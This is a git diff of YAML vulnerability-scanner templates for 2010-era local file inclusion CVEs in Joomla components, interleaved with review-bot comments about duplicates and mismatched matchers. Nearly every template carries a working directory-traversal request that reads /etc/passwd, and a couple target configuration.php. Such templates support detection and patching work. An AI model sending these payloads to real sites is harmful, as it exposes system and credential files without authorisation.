diff --git a/poc/cve/cve-2010-1352.yaml b/poc/cve/cve-2010-1352.yaml deleted file mode 100644 index 9304332380..0000000000 --- a/poc/cve/cve-2010-1352.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1352 - -info: - name: Joomla! Component Juke Box 1.7 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12084 - - https://www.cvedetails.com/cve/CVE-2010-1352 - - http://secunia.com/advisories/39357 - - http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1352 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1353-1630.yaml b/poc/cve/cve-2010-1353-1630.yaml deleted file mode 100644 index 9ef89d2963..0000000000 --- a/poc/cve/cve-2010-1353-1630.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2010-1353 - -info: - name: Joomla! Component LoginBox - Local File Inclusion - author: daffainfo - severity: high - description: "A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php." - reference: - - https://www.exploit-db.com/exploits/12068 - - https://www.cvedetails.com/cve/CVE-2010-1353 - classification: - cve-id: CVE-2010-1353 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/30 diff --git a/poc/cve/cve-2010-1469.yaml b/poc/cve/cve-2010-1469.yaml new file mode 100644 index 0000000000..b8370e009c --- /dev/null +++ b/poc/cve/cve-2010-1469.yaml 
@@ -0,0 +1,30 @@
+id: CVE-2010-1469
+
+info:
+ name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12146
+ - https://www.cvedetails.com/cve/CVE-2010-1469
+ - http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt
+ - http://www.exploit-db.com/exploits/12146
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1469
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/poc/cve/cve-2010-1470-1653.yaml b/poc/cve/cve-2010-1470-1653.yaml
new file mode 100644
index 0000000000..f5117822e8
--- /dev/null
+++ b/poc/cve/cve-2010-1470-1653.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1470
+
+info:
+ name: Joomla! Component Web TV 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12166
+ - https://www.cvedetails.com/cve/CVE-2010-1470
+ - http://web.archive.org/web/20140723205548/http://secunia.com/advisories/39405/
+ - http://www.exploit-db.com/exploits/12166
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1470
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/poc/cve/cve-2010-1474.yaml b/poc/cve/cve-2010-1474.yaml
deleted file mode 100644
index c7a14e2d70..0000000000
--- a/poc/cve/cve-2010-1474.yaml
+++ /dev/null
@@ -1,29 +0,0 @@ -id: CVE-2010-1474 - -info: - name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12182 - - https://www.cvedetails.com/cve/CVE-2010-1474 - - http://secunia.com/advisories/39388 - classification: - cve-id: CVE-2010-1474 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/30 diff --git a/poc/cve/cve-2010-1491.yaml b/poc/cve/cve-2010-1491.yaml deleted file mode 100644 index bbda15aa41..0000000000 --- a/poc/cve/cve-2010-1491.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2010-1491 - -info: - name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12318 - - https://www.cvedetails.com/cve/CVE-2010-1491 - - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt - - http://secunia.com/advisories/39533 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1491 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1494.yaml b/poc/cve/cve-2010-1494.yaml new file mode 100644 index 0000000000..3a962ee055 --- /dev/null +++ b/poc/cve/cve-2010-1494.yaml 
@@ -0,0 +1,29 @@
+id: CVE-2010-1494
+
+info:
+ name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12113
+ - https://www.cvedetails.com/cve/CVE-2010-1494
+ - http://www.exploit-db.com/exploits/12113
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1494
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/poc/cve/cve-2010-1532.yaml b/poc/cve/cve-2010-1532.yaml
deleted file mode 100644
index 79bd64b71f..0000000000
--- a/poc/cve/cve-2010-1532.yaml
+++ /dev/null
@@ -1,30 +0,0 @@ -id: CVE-2010-1532 - -info: - name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12118 - - https://www.cvedetails.com/cve/CVE-2010-1532 - - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt - - http://web.archive.org/web/20210127202836/https://www.securityfocus.com/bid/39348/ - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1532 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/15 diff --git a/poc/cve/cve-2010-1540-1729.yaml b/poc/cve/cve-2010-1540-1729.yaml deleted file mode 100644 index 7871928c1d..0000000000 --- a/poc/cve/cve-2010-1540-1729.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2010-1540 - -info: - name: Joomla! Component com_blog - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. - reference: | - - https://www.exploit-db.com/exploits/11625 - - https://www.cvedetails.com/cve/CVE-2010-1540 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1540 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/06 diff --git a/poc/cve/cve-2010-1657-1761.yaml b/poc/cve/cve-2010-1657-1761.yaml deleted file mode 100644 index b3bc8509e7..0000000000 --- a/poc/cve/cve-2010-1657-1761.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1657 - -info: - name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12428 - - https://www.cvedetails.com/cve/CVE-2010-1657 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2010-1658-1765.yaml b/poc/cve/cve-2010-1658-1765.yaml new file mode 100644 index 0000000000..a6c6045216 --- /dev/null +++ b/poc/cve/cve-2010-1658-1765.yaml 
@@ -0,0 +1,28 @@
+id: CVE-2010-1658
+
+info:
+ name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12427
+ - https://www.cvedetails.com/cve/CVE-2010-1658
+ tags: cve,cve2010,joomla,lfi
+ classification:
+ cve-id: CVE-2010-1658
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/27
diff --git a/poc/cve/cve-2010-1658.yaml b/poc/cve/cve-2010-1658.yaml
new file mode 100644
index 0000000000..aae12dd013
--- /dev/null
+++ b/poc/cve/cve-2010-1658.yaml
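Review bot: `id: CVE-2010-1658` is declared by two new files, poc/cve/cve-2010-1658-1765.yaml in this hunk and poc/cve/cve-2010-1658.yaml in the next one, with the same request and matchers; the copies differ only in the reference list and the order of `tags` and `classification`. Running the directory would send the same probe twice, and depending on how the scanner de-duplicates results the finding may be reported twice. I would keep the copy with four references and drop this one, or at least mark it with `# duplicate of poc/cve/cve-2010-1658.yaml`. The same duplication appears later in this patch for CVE-2010-3203 and CVE-2010-5278.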
@@ -0,0 +1,30 @@
+id: CVE-2010-1658
+
+info:
+ name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12427
+ - https://www.cvedetails.com/cve/CVE-2010-1658
+ - http://www.vupen.com/english/advisories/2010/1007
+ - http://secunia.com/advisories/39600
+ classification:
+ cve-id: CVE-2010-1658
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/27
diff --git a/poc/cve/cve-2010-1659-1773.yaml b/poc/cve/cve-2010-1659-1773.yaml
deleted file mode 100644
index 52761705bc..0000000000
--- a/poc/cve/cve-2010-1659-1773.yaml
+++ /dev/null
@@ -1,28 +0,0 @@ -id: CVE-2010-1659 -info: - name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12426 - - https://nvd.nist.gov/vuln/detail/CVE-2010-1659 - - http://www.securityfocus.com/bid/39739 - - http://www.exploit-db.com/exploits/12426 - classification: - cve-id: CVE-2010-1659 - tags: cve,cve2010,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/poc/cve/cve-2010-1714-1779.yaml b/poc/cve/cve-2010-1714-1779.yaml new file mode 100644 index 0000000000..1dacc59f33 --- /dev/null +++ b/poc/cve/cve-2010-1714-1779.yaml 
@@ -0,0 +1,30 @@
+id: CVE-2010-1714
+
+info:
+ name: Joomla! Component Arcade Games 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12168
+ - https://www.cvedetails.com/cve/CVE-2010-1714
+ - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt
+ - http://secunia.com/advisories/39413
+ classification:
+ cve-id: CVE-2010-1714
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/28
diff --git a/poc/cve/cve-2010-1715.yaml b/poc/cve/cve-2010-1715.yaml
deleted file mode 100644
index 54a29f73dd..0000000000
--- a/poc/cve/cve-2010-1715.yaml
+++ /dev/null
@@ -1,30 +0,0 @@ -id: CVE-2010-1715 - -info: - name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12174 - - https://www.cvedetails.com/cve/CVE-2010-1715 - - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt - - http://www.osvdb.org/63659 - classification: - cve-id: CVE-2010-1715 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/cve/cve-2010-1717-1789.yaml b/poc/cve/cve-2010-1717-1789.yaml deleted file mode 100644 index 2f8f991b93..0000000000 --- a/poc/cve/cve-2010-1717-1789.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2010-1717 - -info: - name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12291 - - https://www.cvedetails.com/cve/CVE-2010-1717 - - http://web.archive.org/web/20140805095004/http://secunia.com/advisories/39526/ - - http://www.vupen.com/english/advisories/2010/0924 - classification: - cve-id: CVE-2010-1717 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/01 diff --git a/poc/cve/cve-2010-1718.yaml b/poc/cve/cve-2010-1718.yaml deleted file mode 100644 index 6be07b8c31..0000000000 --- a/poc/cve/cve-2010-1718.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2010-1718 - -info: - name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12282 - - https://www.cvedetails.com/cve/CVE-2010-1718 - - http://secunia.com/advisories/39521 - - http://web.archive.org/web/20210121195621/https://www.securityfocus.com/bid/39545/ - classification: - cve-id: CVE-2010-1718 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/01 diff --git a/poc/cve/cve-2010-1858.yaml b/poc/cve/cve-2010-1858.yaml deleted file mode 100644 index f25a5c5109..0000000000 --- a/poc/cve/cve-2010-1858.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2010-1858 - -info: - name: Joomla! Component SMEStorage - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/11853 - - https://www.cvedetails.com/cve/CVE-2010-1858 - - http://web.archive.org/web/20210121194940/https://www.securityfocus.com/bid/38911/ - - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1858 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/15 diff --git a/poc/cve/cve-2010-1953-1841.yaml b/poc/cve/cve-2010-1953-1841.yaml new file mode 100644 index 0000000000..106ad37fdc --- /dev/null +++ b/poc/cve/cve-2010-1953-1841.yaml 
@@ -0,0 +1,27 @@
+id: CVE-2010-1953
+
+info:
+ name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12288
+ - https://www.cvedetails.com/cve/CVE-2010-1953
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2010-1981.yaml b/poc/cve/cve-2010-1981.yaml
new file mode 100644
index 0000000000..00c934810c
--- /dev/null
+++ b/poc/cve/cve-2010-1981.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-1981
+
+info:
+ name: Joomla! Component Fabrik 2.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12087
+ - https://www.cvedetails.com/cve/CVE-2010-1981
+ - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt
+ - http://www.exploit-db.com/exploits/12087
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1981
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
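Review bot: The regex matcher in poc/cve/cve-2010-1953-1841.yaml is `"root:.*:0:0"`, without the trailing colon that the other passwd matchers added in this commit use, and the template has no `classification:` block. The shorter pattern is slightly looser than the rest of the set, and the missing `cve-id` makes its results harder to join with the others when findings are grouped by CVE. I would change the matcher line to `- "root:.*:0:0:"` and add `classification:` with `cve-id: CVE-2010-1953` next to `tags:`.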
diff --git a/poc/cve/cve-2010-1982.yaml b/poc/cve/cve-2010-1982.yaml
new file mode 100644
index 0000000000..4f2ab61d04
--- /dev/null
+++ b/poc/cve/cve-2010-1982.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-1982
+
+info:
+ name: Joomla! Component JA Voice 2.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12121
+ - https://www.cvedetails.com/cve/CVE-2010-1982
+ - http://secunia.com/advisories/39202
+ - http://web.archive.org/web/20210121195400/https://www.securityfocus.com/bid/39343/
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1982
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/poc/cve/cve-2010-2682-1960.yaml b/poc/cve/cve-2010-2682-1960.yaml
new file mode 100644
index 0000000000..c719e57407
--- /dev/null
+++ b/poc/cve/cve-2010-2682-1960.yaml
@@ -0,0 +1,32 @@
+id: CVE-2010-2682
+
+info:
+ name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+ remediation: Upgrade to a supported version.
+ reference:
+ - https://www.exploit-db.com/exploits/14017
+ - https://www.cvedetails.com/cve/CVE-2010-2682
+ tags: cve,cve2010,joomla,lfi
+ classification:
+ cve-id: CVE-2010-2682
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/poc/cve/cve-2010-2920.yaml b/poc/cve/cve-2010-2920.yaml
deleted file mode 100644
index 67f0851855..0000000000
--- a/poc/cve/cve-2010-2920.yaml
+++ /dev/null
@@ -1,33 +0,0 @@ -id: CVE-2010-2920 - -info: - name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12120 - - https://www.cvedetails.com/cve/CVE-2010-2920 - - http://www.vupen.com/english/advisories/2010/1844 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2920 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/poc/cve/cve-2010-3203-1987.yaml b/poc/cve/cve-2010-3203-1987.yaml new file mode 100644 index 0000000000..82386d99c8 --- /dev/null +++ b/poc/cve/cve-2010-3203-1987.yaml 
@@ -0,0 +1,34 @@
+id: CVE-2010-3203
+
+info:
+ name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/14845
+ - https://www.cvedetails.com/cve/CVE-2010-3203
+ - http://web.archive.org/web/20150105095919/http://secunia.com:80/advisories/41187/
+ - http://www.exploit-db.com/exploits/14845
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-3203
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/poc/cve/cve-2010-3203.yaml b/poc/cve/cve-2010-3203.yaml
new file mode 100644
index 0000000000..17042d0b25
--- /dev/null
+++ b/poc/cve/cve-2010-3203.yaml
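Review bot: The matcher in poc/cve/cve-2010-3203-1987.yaml does not correspond to the file the request asks for: the path retrieves `configuration.php` through `dflink`, while the regex matcher is `"root:.*:0:0:"`, the passwd pattern used by the other templates in this commit. With `matchers-condition: and` the template will very likely stay silent even where the component is vulnerable, so a clean result from it is not evidence that the host is patched. The requested file and the matcher should be made to agree; until then I would add `# NOTE(review): matcher expects passwd content but the request fetches configuration.php - negative results are not reliable`. The same mismatch is present in poc/cve/cve-2010-3203.yaml in the next hunk.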
@@ -0,0 +1,34 @@ +id: CVE-2010-3203 + +info: + name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval + author: daffainfo + severity: high + description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. + reference: + - https://www.exploit-db.com/exploits/14845 + - https://www.cvedetails.com/cve/CVE-2010-3203 + - http://secunia.com/advisories/41187 + - http://www.exploit-db.com/exploits/14845 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-3203 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/poc/cve/cve-2010-4239-1997.yaml b/poc/cve/cve-2010-4239-1997.yaml deleted file mode 100644 index cf068ecd83..0000000000 --- a/poc/cve/cve-2010-4239-1997.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2010-4239 -info: - name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion - author: 0x_akoko - severity: high - description: Tiki Wiki CMS Groupware 5.2 has Local File Inclusion - reference: - - https://www.cvedetails.com/cve/CVE-2010-4239 - - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2010-4239 - cwe-id: CWE-20 